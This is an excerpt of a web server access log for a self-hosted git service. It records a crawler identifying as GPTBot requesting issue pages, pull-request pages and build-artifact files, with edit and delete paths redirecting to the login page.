AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9978] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:39:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues" +[17/Feb/2026:17:39:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9981] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" +[17/Feb/2026:17:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10166] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?state=closed&type=all" +[17/Feb/2026:17:39:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9971] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=1&state=all&type=all" +[17/Feb/2026:17:39:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:55 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 10109] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 11804] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 11356] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 11187] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 11362] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0" +[17/Feb/2026:17:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db?display=rendered" [Client 74.7.227.38] [Length 10871] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest/my_database.db" +[17/Feb/2026:17:39:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:39:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 1011] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 10578] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 9898] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 9815] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:40:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 9872] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" +[17/Feb/2026:17:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 581] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" [Client 74.7.227.38] [Length 10963] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GeneratedMSBuildEditorConfig.editorconfig" +[17/Feb/2026:17:40:09 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/Debug" +[17/Feb/2026:17:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 10306] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 9863] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 1001] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" [Client 74.7.227.38] [Length 65] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.AssemblyInfoInputs.cache" +[17/Feb/2026:17:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" [Client 74.7.227.38] [Length 9863] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.CoreCompileInputs.cache" +[17/Feb/2026:17:40:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" [Client 74.7.227.38] [Length 9865] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.csproj.AssemblyReference.cache" +[17/Feb/2026:17:40:13 +0000] - 200 200 